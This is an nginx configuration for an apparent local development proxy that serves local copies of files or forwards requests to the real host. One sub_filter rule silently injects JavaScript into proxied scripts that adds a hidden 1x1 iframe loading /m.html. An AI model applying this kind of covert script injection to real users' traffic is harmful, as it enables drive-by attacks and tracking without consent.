#!nginx -p . -c cocproxy.nginx.conf
 
error_log /dev/stderr debug;
daemon off;
 
events {
  worker_connections 48;
}
 
http {
  # include       /etc/nginx/mime.types;
  types {
      application/x-javascript              js;
      application/x-shockwave-flash         swf;
      application/xhtml+xml                 xhtml;
      image/gif                             gif;
      image/jpeg                            jpeg jpg;
      image/png                             png;
      image/svg+xml                         svg;
      image/tiff                            tif tiff;
      image/x-icon                          ico;
      text/css                              css;
      text/html                             html htm shtml;
      text/plain                            txt;
      text/x-component                      htc;
      text/xml                              xml;
      text/cache-manifest                   appcache;
  }
  default_type  application/octet-stream;
 
  server {
    listen 8087;
    resolver 8.8.8.8;
 
    root '';
    access_log /dev/stdout;
 
    location / {
      if (-f $host/$request_filename) {
        rewrite ^ $host/$request_filename last;
        break;
      }
      if (-f $request_filename) {
        rewrite ^ $request_filename last;
        break;
      }
      if ($uri ~* /mads/static/.+\.js$) {
        expires max;
      }
      sub_filter_types text/javascript;
      sub_filter "(function" ";window.addEventListener('load', function () { var d=document.createElement('div');d.innerHTML='<iframe src=\"/m.html\" width=1 height=1></iframe>';document.body.appendChild(d); });(function";
      proxy_pass       http://$host$request_uri;
      proxy_set_header Host $host;
    }
  }
}